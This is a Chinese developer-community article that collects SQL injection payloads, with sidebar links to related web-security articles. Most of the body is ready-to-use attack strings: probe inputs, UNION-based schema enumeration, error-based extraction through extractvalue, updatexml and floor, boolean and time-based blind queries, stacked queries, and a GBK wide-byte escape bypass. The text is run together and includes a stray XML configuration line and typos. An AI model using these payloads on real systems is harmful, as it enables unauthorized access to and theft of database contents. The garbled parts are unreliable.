AI 助理
备案控制台
开发者社区 数据库 文章 正文

sql注入playload总结

2022-02-04 872
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: sql注入playload总结

sql注入playload总结

















/?q=1/?q=1'/?q=1"/?q=[1]/?q[]=1/?q=1`/?q=1\/?q=1/*'*//?q=1/*!1111'*//?q=1''asd''   <== concat string/?q=1'or'1'='1/?q=1 or 1=1/?q='or''='/?q=")/?q=')/?q=-x()




SQLserver 用的payload0101%'and 1=(select @@version) and '%'='GS的一个客户端参数<add PropertyName="FIGroupChgByPosition" Value="1" name="FIGroupChgByPosition" />









































1、Union联合注入?id=1 order by 1–+?id=-1 union select 1,2,3–+?id=-1 union select 1,database(),3–+?id=-1 union select 1,group_concat(tables),3 from information_schema.tables where table_schema=database()–+2、报错回显(1)Floor()id = 1 and (select 1 from  (select count(*),concat(floor(rand(0)*2),database())x from  information_schema.tables group by x)a)进一步注入只需把划线位置换成注入语句database() => (select group_concat(table_name) from x where table_schema=database())x from…(2)Extractvalue()id = 1 and extractvalue(1,concat(0x7e,(select user()),0x7e))0x7e是波浪线(~),用于将注出来的信息和其他报错信息隔离开0x3a是冒号(:)(3)Updatexml()id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)3、bool盲注?id=1 and 1=1–+?id=1 and 1=2–+?id=1 and length(database())>1–+?id=1 and ascii(mid(database(),1,1))>90–+?id=1 and length((select table_name from information_schema.tables where table_schema=’security’ limit 0,1))>1–+?id=1 and ascii(mid((select table_name form information_schema.tables where table_schema=’security’ limit 0,1),1,1))>90–+4、时间盲注?id=1 and sleep(3) and 1=1–+?id=1 and sleep(3) and 1=2–+?id=1 and sleep(3) and length(database())>1–+?id=1 and sleep(3) and ascii(mid(database(),1,1))>100–+5、堆叠查询注入试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。堆叠注入存在一定局限性,并不是每个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,也可能因为权限不足。Select sno from student;select 1 from student;6、宽字节注入  转义符是反斜杠\,ASCII码为0x5C,在\前面增加高字节,0x5C被当做低字节,组合为“汉字”,导致\符号被“吃掉”,后续字符逃出限制,从而绕过转义。出现宽字节注入漏洞的条件:(1)数据库编码要是GB系列(GBK、GB18030、BIG5等低字节符范围中含有0x5C的双字节字符编码集均存在宽字节注入/绕过,GB2312、UTF编码中\不会被吃掉)(2)使用了转义函数,将GET、POST、cookie传递的参数进行过滤,将单引号、双引号、null等敏感字符用转义符 \ 进行转义。常见的包括addslashes()、mysql_real_escape_string()函数,转义函数的转义作用,就是我们常说的“过滤机制”。当两个条件都满足时才会出现宽字节注入。select a from b where table_schema=%df’abc%df’7、Http Header注入开发人员为验证客户信息(cookie)或用http header 获取客户信息(如:useragent、accept),会对http header 信息进行获取并使用sql进行处理,若安全措施没有做好,很有可能导致sql inject漏洞。


文章标签:
SQL
关键词:
SQL注入
SQL总结
SQL注入总结
@北鲲
目录
相关文章
土木林森
|
4月前
|
SQL 存储 安全
逆袭黑客!掌握Python Web安全精髓,让SQL注入、XSS、CSRF无所遁形!
【7月更文挑战第25天】
土木林森
182 11
东方睿赢
|
2月前
|
SQL 安全 数据库
惊!Python Web安全黑洞大曝光:SQL注入、XSS、CSRF,你中招了吗?
在数字化时代,Web应用的安全性至关重要。许多Python开发者在追求功能时,常忽视SQL注入、XSS和CSRF等安全威胁。本文将深入剖析这些风险并提供最佳实践:使用参数化查询预防SQL注入;通过HTML转义阻止XSS攻击;在表单中加入CSRF令牌增强安全性。遵循这些方法,可有效提升Web应用的安全防护水平,保护用户数据与隐私。安全需持续关注与改进,每个细节都至关重要。
东方睿赢
128 5
众所周知
|
2月前
|
SQL 安全 数据库
深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
在Web开发领域,Python虽强大灵活,却也面临着SQL注入、XSS与CSRF等安全威胁。本文将剖析这些常见攻击手段,并提供示例代码,展示如何利用参数化查询、HTML转义及CSRF令牌等技术构建坚固防线,确保Python Web应用的安全性。安全之路永无止境,唯有不断改进方能应对挑战。
众所周知
64 5
众所周知
|
2月前
|
SQL 安全 数据安全/隐私保护
Python Web安全大挑战:面对SQL注入、XSS、CSRF,你准备好了吗?
在构建Python Web应用时,安全性至关重要。本文通过三个真实案例,探讨了如何防范SQL注入、XSS和CSRF攻击。首先,通过参数化查询替代字符串拼接,防止SQL注入;其次,利用HTML转义机制,避免XSS攻击;最后,采用CSRF令牌验证,保护用户免受CSRF攻击。这些策略能显著增强应用的安全性,帮助开发者应对复杂的网络威胁。安全是一个持续的过程,需不断学习新知识以抵御不断变化的威胁。
众所周知
112 1
东方睿赢
|
2月前
|
SQL 安全 数据库
Python Web开发者必看!SQL注入、XSS、CSRF全面解析,守护你的网站安全!
在Python Web开发中,构建安全应用至关重要。本文通过问答形式,详细解析了三种常见Web安全威胁——SQL注入、XSS和CSRF,并提供了实用的防御策略及示例代码。针对SQL注入,建议使用参数化查询;对于XSS,需对输出进行HTML编码;而防范CSRF,则应利用CSRF令牌。通过这些措施,帮助开发者有效提升应用安全性,确保网站稳定运行。
东方睿赢
47 1
众所周知
|
2月前
|
SQL 安全 数据库
深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
在Web开发领域,Python虽强大灵活,但安全挑战不容小觑。本文剖析Python Web应用中的三大安全威胁:SQL注入、XSS及CSRF,并提供防御策略。通过示例代码展示如何利用参数化查询、HTML转义与CSRF令牌构建安全防线,助您打造更安全的应用。安全是一场持久战,需不断改进优化。
众所周知
46 3
龙大吉
|
2月前
|
SQL 安全 数据库
从入门到精通:Python Web安全守护指南,SQL注入、XSS、CSRF全防御!
【9月更文挑战第13天】在开发Python Web应用时,安全性至关重要。本文通过问答形式,详细介绍如何防范SQL注入、XSS及CSRF等常见威胁。通过使用参数化查询、HTML转义和CSRF令牌等技术,确保应用安全。附带示例代码,帮助读者从入门到精通Python Web安全。
龙大吉
85 6
龙大吉
|
2月前
|
SQL 安全 JavaScript
告别Web安全小白!Python实战指南:抵御SQL注入、XSS、CSRF的秘密武器!
【9月更文挑战第12天】在Web开发中,安全漏洞如同暗礁,尤其对初学者而言,SQL注入、跨站脚本(XSS)和跨站请求伪造(CSRF)是常见挑战。本文通过实战案例,展示如何利用Python应对这些威胁。首先,通过参数化查询防止SQL注入;其次,借助Jinja2模板引擎自动转义机制抵御XSS攻击;最后,使用Flask-WTF库生成和验证CSRF令牌,确保转账功能安全。掌握这些技巧,助你构建更安全的Web应用。
龙大吉
48 5
众所周知
|
4月前
|
SQL 安全 数据库
Python Web开发者必学:SQL注入、XSS、CSRF攻击与防御实战演练!
【7月更文挑战第26天】在 Python Web 开发中, 安全性至关重要。本文聚焦 SQL 注入、XSS 和 CSRF 这三大安全威胁,提供实战防御策略。SQL 注入可通过参数化查询和 ORM 框架来防范;XSS 则需 HTML 转义用户输入与实施 CSP;CSRF 防御依赖 CSRF 令牌和双重提交 Cookie。掌握这些技巧,能有效加固 Web 应用的安全防线。安全是持续的过程,需贯穿开发始终。
众所周知
89 1
Python Web开发者必学:SQL注入、XSS、CSRF攻击与防御实战演练!
sunrr
|
4月前
|
SQL 运维 安全
WAF如何防御SQL注入?
【7月更文挑战第25天】WAF如何防御SQL注入?
sunrr
298 9